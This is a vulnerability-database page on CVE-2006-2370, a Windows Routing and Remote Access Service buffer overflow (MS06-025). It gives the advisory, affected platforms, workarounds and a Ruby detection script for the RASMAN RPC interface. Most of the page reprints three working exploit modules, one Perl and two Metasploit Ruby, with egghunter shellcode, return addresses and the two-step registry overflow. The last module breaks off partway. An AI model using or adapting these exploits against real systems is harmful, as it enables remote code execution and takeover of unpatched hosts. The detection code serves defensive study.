CVE-2006-2370
CVSS 7.5
Published: 2006-06-13 15:06:00
Last revised: 2011-03-07 21:36:04

[Original] Buffer overflow in the Routing and Remote Access service (RRAS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows remote unauthenticated or authenticated attackers to execute arbitrary code via certain crafted "RPC related requests," aka the "RRAS Memory Corruption Vulnerability."


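[CNNVD] Microsoft Windows Routing and Remote Access Service Buffer Overflow Vulnerability (CNNVD-200606-291)

        Microsoft Windows is a very popular operating system released by Microsoft.
        A buffer overflow exists in the Routing and Remote Access service (RRAS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier. A remote attacker can trigger the buffer overflow in the Microsoft Windows Routing and Remote Access Service (RRAS) with a specially crafted RPC request, resulting in arbitrary code execution.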

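- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]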

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_2003_server:standard:sp1
cpe:/o:microsoft:windows_2000::sp1:datacenter_server (Microsoft Windows 2000 Datacenter Server SP1)
cpe:/o:microsoft:windows_2003_server:datacenter_edition_64-bit:sp1
cpe:/o:microsoft:windows_2000::sp3:datacenter_server (Microsoft Windows 2000 Datacenter Server SP3)
cpe:/o:microsoft:windows_2003_server:datacenter_edition
cpe:/o:microsoft:windows_xp::gold:professional (Microsoft Windows XP Professional Gold)
cpe:/o:microsoft:windows_2003_server:r2::datacenter_64-bit
cpe:/o:microsoft:windows_2000::sp2:advanced_server (Microsoft Windows 2000 Advanced Server SP2)
cpe:/o:microsoft:windows_2000::sp2:professional (Microsoft Windows 2000 Professional SP2)
cpe:/o:microsoft:windows_2000::sp3:server (Microsoft Windows 2000 Server SP3)
cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_2003_server:standard_64-bit
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_2003_server:standard
cpe:/o:microsoft:windows_2000::sp4:server (Microsoft Windows 2000 Server SP4)
cpe:/o:microsoft:windows_xp::sp1:home
cpe:/o:microsoft:windows_2003_server:enterprise_64-bit
cpe:/o:microsoft:windows_2000::sp1:professional (Microsoft Windows 2000 Professional SP1)
cpe:/o:microsoft:windows_2000:::datacenter_server
cpe:/o:microsoft:windows_2003_server:datacenter_edition_64-bit
cpe:/o:microsoft:windows_2003_server:sp1::enterprise
cpe:/o:microsoft:windows_xp:::media_center
cpe:/o:microsoft:windows_2000::sp3:professional (Microsoft Windows 2000 Professional SP3)
cpe:/o:microsoft:windows_2003_server:enterprise_edition:sp1
cpe:/o:microsoft:windows_xp:::home
cpe:/o:microsoft:windows_2000::sp1:server (Microsoft Windows 2000 Server SP1)
cpe:/o:microsoft:windows_2003_server:datacenter_edition:sp1
cpe:/o:microsoft:windows_2000::sp3:advanced_server (Microsoft Windows 2000 Advanced Server SP3)
cpe:/o:microsoft:windows_xp:::64-bit
cpe:/o:microsoft:windows_2003_server:enterprise_edition_64-bit:sp1
cpe:/o:microsoft:windows_2000::sp2:datacenter_server (Microsoft Windows 2000 Datacenter Server SP2)
cpe:/o:microsoft:windows_xp::sp2:home
cpe:/o:microsoft:windows_xp::sp2:media_center (Microsoft windows xp_sp2 media_center)
cpe:/o:microsoft:windows_2003_server:web
cpe:/o:microsoft:windows_2003_server:enterprise_edition_64-bit
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000::sp4:datacenter_server (Microsoft Windows 2000 Datacenter Server SP4)
cpe:/o:microsoft:windows_xp::sp2:tablet_pc (Microsoft windows xp_sp2 tablet_pc)
cpe:/o:microsoft:windows_2000::sp1:advanced_server (Microsoft Windows 2000 Advanced Server SP1)
cpe:/o:microsoft:windows_2000::sp2:server (Microsoft Windows 2000 Server SP2)
cpe:/o:microsoft:windows_2003_server:web:sp1
cpe:/o:microsoft:windows_2000::sp4:professional (Microsoft Windows 2000 Professional SP4)
cpe:/o:microsoft:windows_xp::sp1:media_center (Microsoft windows xp_sp1 media_center)
cpe:/o:microsoft:windows_2000::sp4:advanced_server (Microsoft Windows 2000 Advanced Server SP4)

- OVAL (technical details for detection)

oval:org.mitre.oval:def:2061 - RRAS Memory Corruption Vulnerability (WinXP,SP1)
oval:org.mitre.oval:def:1936 - RRAS Memory Corruption Vulnerability (S03,SP1)
oval:org.mitre.oval:def:1823 - RRAS Memory Corruption Vulnerability (WinXP,SP2)
oval:org.mitre.oval:def:1741 - RRAS Memory Corruption Vulnerability (Win2K)
oval:org.mitre.oval:def:1720 - RRAS Memory Corruption Vulnerability (WinS03)
oval:org.mitre.oval:def:1587 - RRAS Memory Corruption Vulnerability (64-bit XP)
oval:gov.nist.fdcc.patch:def:44 - MS06-025: Vulnerability in Routing and Remote Access Could Allow Remote Code Execution (911280)
oval:gov.nist.USGCB.patch:def:44 - MS06-025: Vulnerability in Routing and Remote Access Could Allow Remote Code Execution (911280)
*OVAL describes in detail how to detect this vulnerability; more technical detail on detection can be found in the relevant OVAL definitions.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2370
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2370
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-291
(Official data source) CNNVD

- Other links and resources

http://www.us-cert.gov/cas/techalerts/TA06-164A.html
(UNKNOWN)  CERT  TA06-164A
http://www.kb.cert.org/vuls/id/631516
(UNKNOWN)  CERT-VN  VU#631516
http://www.securityfocus.com/bid/18325
(PATCH)  BID  18325
http://www.osvdb.org/26437
(PATCH)  OSVDB  26437
http://www.microsoft.com/technet/security/bulletin/ms06-025.mspx
(VENDOR_ADVISORY)  MS  MS06-025
http://secunia.com/advisories/20630
(VENDOR_ADVISORY)  SECUNIA  20630
http://www.vupen.com/english/advisories/2006/2323
(UNKNOWN)  VUPEN  ADV-2006-2323
http://securitytracker.com/id?1016285
(UNKNOWN)  SECTRACK  1016285
http://xforce.iss.net/xforce/xfdb/26812
(UNKNOWN)  XF  win-rras-bo(26812)

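- Vulnerability information

Microsoft Windows Routing and Remote Access Service Buffer Overflow Vulnerability
High risk  Buffer overflow
2006-06-13 00:00:00 2006-11-30 00:00:00
Remote
        Microsoft Windows is a very popular operating system released by Microsoft.
        A buffer overflow exists in the Routing and Remote Access service (RRAS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier. A remote attacker can trigger the buffer overflow in the Microsoft Windows Routing and Remote Access Service (RRAS) with a specially crafted RPC request, resulting in arbitrary code execution.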

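- Advisories and patches

        Workarounds:
        * Disable the Remote Access Connection Manager service.
        * Block at the firewall:
         UDP ports 135, 137, 138 and 445, and TCP ports 135, 139, 445 and 593
         All unsolicited inbound traffic on ports greater than 1024
         Any other specifically configured RPC port
        * Use a personal firewall, such as the Internet Connection Firewall bundled with Windows XP and Windows Server 2003.
        * Enable advanced TCP/IP filtering on systems that support it.
        * Use IPSec on affected systems to block the affected ports.
        Microsoft has released a security bulletin (MS06-025) and corresponding patches for this issue:
        MS06-025: Vulnerability in Routing and Remote Access Could Allow Remote Code Execution (911280)
        Link:
        http://www.microsoft.com/technet/security/Bulletin/MS06-025.mspx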
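
Where the SMB ports named in the workarounds have to stay open, a sensor can still watch for DCE/RPC traffic to the interface that the public modules listed on this page bind to (UUID 20610036-fa22-11cf-9823-00a0c911e5df, opnums 0x0A and 0x0C). The following is an added example, not code from the advisory or from the Metasploit project; the class and helper names and the sample PDUs are constructed, and it assumes the sensor already hands it whole DCE/RPC PDUs extracted from the named pipe.

```ruby
# Added example: flag DCE/RPC binds and requests aimed at the RRAS/RASMAN interface.
RASMAN_UUID    = '20610036-fa22-11cf-9823-00a0c911e5df' # interface UUID quoted on this page
WATCHED_OPNUMS = [0x0A, 0x0C].freeze                     # opnums the listed modules call
PTYPE_REQUEST, PTYPE_BIND, PTYPE_ALTER_CONTEXT = 0, 11, 14

# Render the 16 wire bytes of a UUID as text. The first three fields follow
# the byte order announced in the PDU's data-representation (drep) field.
def uuid_from_wire(bytes, little_endian)
  d1, d2, d3 = bytes.byteslice(0, 8).unpack(little_endian ? 'Vvv' : 'Nnn')
  rest = bytes.byteslice(8, 8).unpack1('H*')
  format('%08x-%04x-%04x-%s-%s', d1, d2, d3, rest[0, 4], rest[4, 12])
end

def uuid_to_wire(text) # little-endian encoder, used only to build the samples
  d1, d2, d3, d4, d5 = text.split('-')
  [d1.hex, d2.hex, d3.hex].pack('Vvv') + [d4 + d5].pack('H*')
end

class RrasRpcWatch
  attr_reader :alerts

  def initialize
    @watched = {} # presentation context id => true once bound to RASMAN_UUID
    @alerts  = []
  end

  # Feed one complete connection-oriented DCE/RPC PDU (version 5).
  def feed(raw)
    pdu = raw.to_s.b
    return if pdu.bytesize < 16 || pdu.getbyte(0) != 5
    le       = (pdu.getbyte(4) & 0xF0) == 0x10
    frag_len = pdu.byteslice(8, 2).unpack1(le ? 'v' : 'n')
    return if frag_len > pdu.bytesize # truncated capture, do not read past it
    case pdu.getbyte(2)
    when PTYPE_BIND, PTYPE_ALTER_CONTEXT then scan_contexts(pdu, le, frag_len)
    when PTYPE_REQUEST                   then scan_request(pdu, le, frag_len)
    end
  end

  private

  # Walk every presentation context: a bind may offer several interfaces,
  # and the one of interest need not be the first.
  def scan_contexts(pdu, le, frag_len)
    return if frag_len < 28
    off = 28
    pdu.getbyte(24).times do
      break if off + 24 > frag_len
      ctx_id = pdu.byteslice(off, 2).unpack1(le ? 'v' : 'n')
      n_xfer = pdu.getbyte(off + 2)
      uuid   = uuid_from_wire(pdu.byteslice(off + 4, 16), le)
      if uuid == RASMAN_UUID
        @watched[ctx_id] = true
        @alerts << "bind to #{uuid} on context #{ctx_id}"
      end
      off += 24 + 20 * n_xfer # abstract syntax plus each 20-byte transfer syntax
    end
  end

  # A request names its interface only through the context id set up at bind time.
  def scan_request(pdu, le, frag_len)
    return if frag_len < 24
    ctx_id, opnum = pdu.byteslice(20, 4).unpack(le ? 'vv' : 'nn')
    return unless @watched[ctx_id] && WATCHED_OPNUMS.include?(opnum)
    @alerts << format('request opnum 0x%02x on context %d', opnum, ctx_id)
  end
end

# --- constructed sample PDUs (little-endian, no auth trailer) ---
def pdu_header(ptype, body, call_id)
  [5, 0, ptype, 0x03, 0x10, 0, 0, 0, 16 + body.bytesize, 0, call_id].pack('C8vvV')
end

def sample_bind(interfaces)
  ndr = uuid_to_wire('8a885d04-1ceb-11c9-9fe8-08002b104860') + [2].pack('V')
  items = interfaces.each_with_index.map do |(uuid, major), i|
    [i, 1, 0].pack('vCC') + uuid_to_wire(uuid) + [major, 0].pack('vv') + ndr
  end
  body = [4280, 4280, 0, interfaces.size, 0, 0].pack('vvVCCv') + items.join
  pdu_header(PTYPE_BIND, body, 1) + body
end

def sample_request(ctx_id, opnum, stub)
  body = [stub.bytesize, ctx_id, opnum].pack('Vvv') + stub
  pdu_header(PTYPE_REQUEST, body, 2) + body
end

def demo_alerts
  watch = RrasRpcWatch.new
  # Context 0 is an unrelated interface, context 1 is the watched one.
  watch.feed(sample_bind([['6bffd098-a112-3610-9833-46c3f87e345a', 1], [RASMAN_UUID, 1]]))
  watch.feed(sample_request(1, 0x0A, 'A' * 8)) # watched context and opnum
  watch.feed(sample_request(0, 0x0A, 'A' * 8)) # other interface, ignored
  watch.feed(sample_request(1, 0x02, 'A' * 8)) # unwatched opnum, ignored
  watch.alerts
end

puts demo_alerts if __FILE__ == $PROGRAM_NAME
```

One `RrasRpcWatch` instance is meant to track one connection, since presentation context ids are only meaningful within the connection that negotiated them.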

- Vulnerability information (1965)

MS Windows RRAS RASMAN Registry Stack Overflow Exploit (MS06-025) (EDBID:1965)
windows remote
2006-06-29 Verified
445 Pusscat
N/A
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::rras_ms06_025_rasman;
use base "Msf::Exploit";
use strict;

use Pex::DCERPC;
use Pex::SMB;
use Pex::NDR;

my $advanced = {
	'FragSize'    => [ 256, 'The DCERPC fragment size' ],
	'BindEvasion' => [ 0,   'IDS Evasion of the Bind request' ],
	'DirectSMB'   => [ 0,   'Use direct SMB (445/tcp)' ],
  };

my $info = {
	'Name'    => 'Microsoft RRAS MSO6-025 RASMAN Registry Stack Overflow',
	'Version' => '$Revision: 1.1 $',
	'Authors' =>
	  [
		'Pusscat <pusscat [at] gmail.com>',
		'H D Moore <hdm [at] metasploit.com>'
	  ],

	'Arch' => ['x86'],
	'OS'   => [ 'win32', 'win2000', 'winxp' ],
	'Priv' => 1,

	'AutoOpts' => { 'EXITFUNC' => 'thread' },
	'UserOpts' =>
	  {
		'RHOST' => [ 1, 'ADDR', 'The target address' ],

		# SMB connection options
		'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],
		'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username',''],
		'SMBDOM'  => [ 0, 'DATA', 'The domain for specified SMB username', '' ],
		'SMBPIPE' => [ 1, 'DATA', 'The pipe name to use (2000=ROUTER, XP=SRVSVC)', 'ROUTER' ],
	  },

	'Payload' =>
	  {
		'Space'    =>1024,
		'BadChars' => "\x00\x2c\x5c\x2e\x3a\x24",

		# sub esp, 4097 + inc esp makes stack happy
		'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
	  },

	'Description' => Pex::Text::Freeform(
		qq{
    		This module exploits a registry-based stack overflow in the Windows Routing 
			and Remote Access Service. Since the service is hosted inside svchost.exe, 
			a failed exploit attempt can cause other system services to fail as well. 
			A valid username and password is required to exploit this flaw on Windows 2000. 
			When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
			Exploiting this flaw involves two distinct steps - creating the registry key
			and then triggering an overwrite based on a read of this key. Once the key is
			created, it cannot be recreated. This means that for any given system, you
			only get one chance to exploit this flaw. Picking the wrong target will require
			a manual removal of the following registry key before you can try again:
			HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook
}
	  ),

	'Refs' =>
	  [
		[ 'BID', '18325' ],
		[ 'CVE', '2006-2370' ],
		[ 'OSVDB', '26437' ],
		[ 'MSB', 'MS06-025' ]
	  ],

	'DefaultTarget' => 0,
	'Targets'       =>
	  [
		[ 'Automatic' ],
		[ 'Windows 2000',   0x750217ae ], # call esi
	  ],

	'Keys' => ['rras'],

	'DisclosureDate' => 'Jun 13 2006',
  };

sub new {
	my ($class) = @_;
	my $self    = $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );
	return ($self);
}

sub Exploit {
	my ($self)      = @_;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target      = $self->Targets->[$target_idx];

	my $FragSize = $self->GetVar('FragSize') || 256;
	my $target   = $self->Targets->[$target_idx];

	my ( $res, $rpc );

	my $pipe    = "\\" . $self->GetVar("SMBPIPE");
	my $uuid    = '20610036-fa22-11cf-9823-00a0c911e5df';
	my $version = '1.0';

	my $handle =
	  Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host,
		$pipe );

	my $dce = Pex::DCERPC->new(
		'handle'      => $handle,
		'username'    => $self->GetVar('SMBUSER'),
		'password'    => $self->GetVar('SMBPASS'),
		'domain'      => $self->GetVar('SMBDOM'),
		'fragsize'    => $self->GetVar('FragSize'),
		'bindevasion' => $self->GetVar('BindEvasion'),
		'directsmb'   => $self->GetVar('DirectSMB'),
	  );

	if ( !$dce ) {
		$self->PrintLine("[*] Could not bind to $handle");
		return;
	}

	my $smb = $dce->{'_handles'}{$handle}{'connection'};
	if ( $target->[0] =~ /Auto/ ) {
		if ( $smb->PeerNativeOS eq 'Windows 5.0' ) {
			$target = $self->Targets->[1];
			$self->PrintLine('[*] Detected a Windows 2000 target...');
		}
		#elsif ( $smb->PeerNativeOS eq 'Windows 5.1' ) {
		#	$target = $self->Targets->[2];
		#	$self->PrintLine('[*] Detected a Windows XP target...');
		#}
		else {
			$self->PrintLine( '[*] No target available : ' . $smb->PeerNativeOS() );
			return;
		}
	}

	# Shiny new egghunt from the 3.0 code :-)
	my $egghunt =
	  "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02" .
	  "\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" .
	  "\x41\x41\x41\x41".
	  "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";

	# Pick a "filler" character that we know doesn't get mangled
	# by the wide string conversion routines
	my $fillset = "\xc1\xff\x67\x1b\xd3\xa3\xe7";
	my $filler  = substr($fillset, rand(length($fillset)), 1);
	my $eggtag  = '';
	my $pattern = '';

	while (length($eggtag) < 4) {
		$eggtag .= substr($fillset, rand(length($fillset)), 1);
	}

	# Configure the egg
	substr($egghunt, 0x12, 4, $eggtag);

	# We use an egghunter to give us nearly unlimited room for shellcode
	my $eggdata =
	  ($filler x 1024).
	  $eggtag.
	  $eggtag.
	  $shellcode.
	  ($filler x 1024);

	# Mini-payload that launches the egghunt
	my $bof = $filler x 178;
	substr($bof, 84, length($egghunt), $egghunt);

	# Base pointer override occurs with this string
	my $pat =
	  ($filler x 886).
	  pack('V', $target->[1]).
	  ($filler x 3). "\xc0".
	  $bof;

	# The vulnerability is triggered with the second field of this structure
	my $type2 =
	  Pex::NDR::UnicodeConformantVaryingStringPreBuilt( ($filler x 1024) . "\x00" ).
	  Pex::NDR::UnicodeConformantVaryingStringPreBuilt( $pat . "\x00" ).
	  Pex::NDR::UnicodeConformantVaryingStringPreBuilt( ($filler x 4096) . "\x00" ).
	  Pex::NDR::Long( int(rand(0xffffffff)) ).
	  Pex::NDR::Long( int(rand(0xffffffff)) );

	# Another gigantic structure, many of these fields up as registry values
	my $type1 =
	  Pex::NDR::Long(int(rand(0xffffffff))) . # OperatorDial
	  Pex::NDR::Long(int(rand(0xffffffff))) . # PreviewPhoneNumber
	  Pex::NDR::Long(int(rand(0xffffffff))) . # UseLocation
	  Pex::NDR::Long(int(rand(0xffffffff))) . # ShowLights
	  Pex::NDR::Long(int(rand(0xffffffff))) . # ShowConnectStatus
	  Pex::NDR::Long(int(rand(0xffffffff))) . # CloseOnDial
	  Pex::NDR::Long(int(rand(0xffffffff))) . # AllowLogonPhonebookEdits
	  Pex::NDR::Long(int(rand(0xffffffff))) . # AllowLogonLocationEdits
	  Pex::NDR::Long(int(rand(0xffffffff))) . # SkipConnectComplete
	  Pex::NDR::Long(int(rand(0xffffffff))) . # NewEntryWizard
	  Pex::NDR::Long(int(rand(0xffffffff))) . # RedialAttempts
	  Pex::NDR::Long(int(rand(0xffffffff))) . # RedialSeconds
	  Pex::NDR::Long(int(rand(0xffffffff))) . # IdleHangUpSeconds
	  Pex::NDR::Long(int(rand(0xffffffff))) . # RedialOnLinkFailure
	  Pex::NDR::Long(int(rand(0xffffffff))) . # PopupOnTopWhenRedialing
	  Pex::NDR::Long(int(rand(0xffffffff))) . # ExpandAutoDialQuery
	  Pex::NDR::Long(int(rand(0xffffffff))) . # CallbackMode
	  Pex::NDR::Long(0x45).
	  $type2.
	  Pex::NDR::UnicodeConformantVaryingString("\x00" x 129).
	  Pex::NDR::Long(int(rand(0xffffffff))).
	  Pex::NDR::UnicodeConformantVaryingString("\x00" x 520).
	  Pex::NDR::UnicodeConformantVaryingString("\x00" x 520).
	  Pex::NDR::Long(int(rand(0xffffffff))).
	  Pex::NDR::Long(int(rand(0xffffffff))).
	  Pex::NDR::Long(int(rand(0xffffffff))).
	  Pex::NDR::Long(int(rand(0xffffffff))).
	  Pex::NDR::Long(int(rand(0xffffffff))).
	  Pex::NDR::Long(int(rand(0xffffffff))).
	  Pex::NDR::Long(int(rand(0xffffffff))).
	  Pex::NDR::Long(int(rand(0xffffffff))).
	  Pex::NDR::UnicodeConformantVaryingString("\x00" x 514).
	  Pex::NDR::Long(int(rand(0xffffffff))).
	  Pex::NDR::Long(int(rand(0xffffffff)));

	# Create the actual RPC stub and tack our payload on the end
	my $stub =
	  $type1.
	  Pex::NDR::Long(int(rand(0xffffffff))).
	  $eggdata;

	$self->PrintLine("[*] Creating the malicious registry key...");
	my @response = $dce->request( $handle, 0x0A, $stub );

	$self->PrintLine("[*] Triggering the base pointer overwrite...");
	my @response = $dce->request( $handle, 0x0A, $stub );

	if (@response) {
		$self->PrintLine('[*] RPC server responded with:');
		foreach my $line (@response) {
			$self->PrintLine( '[*] ' . $line );
		}
		$self->PrintLine('[*] This probably means that the system is patched');
	}
	return;
}

1;

# milw0rm.com [2006-06-29]
		

- Vulnerability information (16364)

Microsoft RRAS Service Overflow (EDBID:16364)
windows remote
2010-05-09 Verified
0 metasploit
N/A
##
# $Id: ms06_025_rras.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft RRAS Service Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the Windows Routing and Remote
				Access Service. Since the service is hosted inside svchost.exe, a failed
				exploit attempt can cause other system services to fail as well. A valid
				username and password is required to exploit this flaw on Windows 2000.
				When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.			},
			'Author'         =>
				[
					'Nicolas Pouvesle <nicolas.pouvesle [at] gmail.com>',
					'hdm'
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2006-2370' ],
					[ 'OSVDB', '26437' ],
					[ 'BID', '18325' ],
					[ 'MSB', 'MS06-025' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1104,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 SP4', { 'Ret' => 0x7571c1e4 } ],
					[ 'Windows XP SP1',   { 'Ret' => 0x7248d4cc } ],
				],

			'DisclosureDate' => 'Jun 13 2006'))

		register_options(
			[
				OptString.new('SMBPIPE', [ true,  "The pipe name to use (ROUTER, SRVSVC)", 'ROUTER']),
			], self.class)
	end

	# Post authentication bugs are rarely useful during automation
	def autofilter
		false
	end

	def exploit

		connect()
		smb_login()

		handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])

		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")


		print_status('Getting OS...')

		# Check the remote OS name and version
		os = smb_peer_os
		pat = ''

		case os
		when /Windows 5\.0/
			pat =
				payload.encoded +
				"\xeb\x06" +
				rand_text_alphanumeric(2) +
				[target.ret].pack('V') +
				"\xe9\xb7\xfb\xff\xff"
			os = 'Windows 2000'
		when /Windows 5\.1/
			pat =
				rand_text_alphanumeric(0x4c) +
				"\xeb\x06" +
				rand_text_alphanumeric(2) +
				[target.ret].pack('V') +
				payload.encoded
			os = 'Windows XP'
		end

		req = [1, 0x49].pack('VV') + pat + rand_text_alphanumeric(0x4000-pat.length)
		len = req.length
		stb =
			NDR.long(0x20000) +
			NDR.long(len) +
			req           +
			NDR.long(len)

		print_status("Calling the vulnerable function on #{os}...")

		begin
			dcerpc.call(0x0C, stb)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
		rescue => e
			if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
				raise e
			end
		end

		# Cleanup
		handler
		disconnect
	end

end
		

- Vulnerability information (16375)

Microsoft RRAS Service RASMAN Registry Overflow (EDBID:16375)
windows remote
2010-08-25 Verified
0 metasploit
N/A
##
# $Id: ms06_025_rasmans_reg.rb 10150 2010-08-25 20:55:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Egghunter
	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft RRAS Service RASMAN Registry Overflow',
			'Description'    => %q{
					This module exploits a registry-based stack buffer overflow in the Windows Routing
				and Remote Access Service. Since the service is hosted inside svchost.exe,
				a failed exploit attempt can cause other system services to fail as well.
				A valid username and password is required to exploit this flaw on Windows 2000.
				When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
				Exploiting this flaw involves two distinct steps - creating the registry key
				and then triggering an overwrite based on a read of this key. Once the key is
				created, it cannot be recreated. This means that for any given system, you
				only get one chance to exploit this flaw. Picking the wrong target will require
				a manual removal of the following registry key before you can try again:
				HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook
			},
			'Author'         => [ 'pusscat', 'hdm' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 10150 $',
			'References'     =>
				[
					[ 'CVE', '2006-2370' ],
					[ 'OSVDB', '26437' ],
					[ 'BID', '18325' ],
					[ 'MSB', 'MS06-025' ]
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread'
				},
			'Payload'        =>
				{
					'Space'    => 512,
					'BadChars' => "\x00\x2c\x5c\x2e\x3a\x24",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 SP4', { 'Ret' => 0x750217ae } ],  # call esi
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Jun 13 2006'))

		register_options(
			[
				OptString.new('SMBPIPE', [ true,  "Rawr.", 'router']),
			], self.class)
	end

	# Post authentication bugs are rarely useful during automation
	def autofilter
		false
	end

	def exploit
		connect()
		smb_login()
		print_status("Trying target #{target.name}...")

		# Generate the egghunter payload
		hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
		egg    = hunter[1]

		# Pick a "filler" character that we know doesn't get mangled
		# by the wide string conversion routines
		filset = "\xc1\xff\x67\x1b\xd3\xa3\xe7"
		fil    = filset[ rand(filset.length) ].chr

		# Bind to the actual DCERPC interface
		handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
		print_status("Binding to #{handle}")
		dcerpc_bind(handle)
		print_status("Bound to #{handle}")

		# Add giant blocks of guard data before and after the egg
		eggdata  =
			fil * 1024 +
			egg +
			fil * 1024

		# Place the egghunter where ESI happens to point
		bof = (fil * 178)
		bof[84, hunter[0].length] = hunter[0]

		# Overwrite the SEH ptr, even though ESP is smashed
		# The handle after the ret must be an invalid address
		pat =
			(fil * 886) +
			NDR.long(target.ret) +
			(fil * 3) + "\xc0" +
			bof

		type2 =
			NDR.string( (fil * 1024) + "\x00" ) +
			NDR.string( pat + "\x00" ) +
			NDR.string( (fil * 4096) + "\x00" ) +
				NDR.long(rand(0xffffffff)) +
				NDR.long(rand(0xffffffff))

		type1 =
			NDR.long(rand(0xffffffff)) + # OperatorDial
			NDR.long(rand(0xffffffff)) + # PreviewPhoneNumber
			NDR.long(rand(0xffffffff)) + # UseLocation
			NDR.long(rand(0xffffffff)) + # ShowLights
			NDR.long(rand(0xffffffff)) + # ShowConnectStatus
			NDR.long(rand(0xffffffff)) + # CloseOnDial
			NDR.long(rand(0xffffffff)) + # AllowLogonPhonebookEdits
			NDR.long(rand(0xffffffff)) + # AllowLogonLocationEdits
			NDR.long(rand(0xffffffff)) + # SkipConnectComplete
			NDR.long(rand(0xffffffff)) + # NewEntryWizard
			NDR.long(rand(0xffffffff)) + # RedialAttempts
			NDR.long(rand(0xffffffff)) + # RedialSeconds
			NDR.long(rand(0xffffffff)) + # IdleHangUpSeconds
			NDR.long(rand(0xffffffff)) + # RedialOnLinkFailure
			NDR.long(rand(0xffffffff)) + # PopupOnTopWhenRedialing
			NDR.long(rand(0xffffffff)) + # ExpandAutoDialQuery
			NDR.long(rand(0xffffffff)) + # CallbackMode

			NDR.long(0x45) + type2 +     # Parsed by CallbackListFromRpc
			NDR.wstring("\x00" * 129)  +
			NDR.long(rand(0xffffffff)) +
			NDR.wstring("\x00" * 520)  +
			NDR.wstring("\x00" * 520)  +

			NDR.long(rand(0xffffffff)) +
			NDR.long(rand(0xffffffff)) +
			NDR.long(rand(0xffffffff)) +
			NDR.long(rand(0xffffffff)) +
			NDR.long(rand(0xffffffff)) +
			NDR.long(rand(0xffffffff)) +
			NDR.long(rand(0xffffffff)) +
			NDR.long(rand(0xffffffff)) +

			NDR.string("\x00" * 514) +

			NDR.long(rand(0xffffffff)) +
				NDR.long(rand(0xffffffff))

		stubdata =
			type1 +
			NDR.long(rand(0xffffffff)) +
			eggdata

		print_status('Stub is ' + stubdata.length.to_s + ' bytes long.')

		begin
			print_status('Creating the malicious registry key...')
			response = dcerpc.call(0xA, stubdata)

			print_status('Attempting to trigger the base pointer overwrite...')
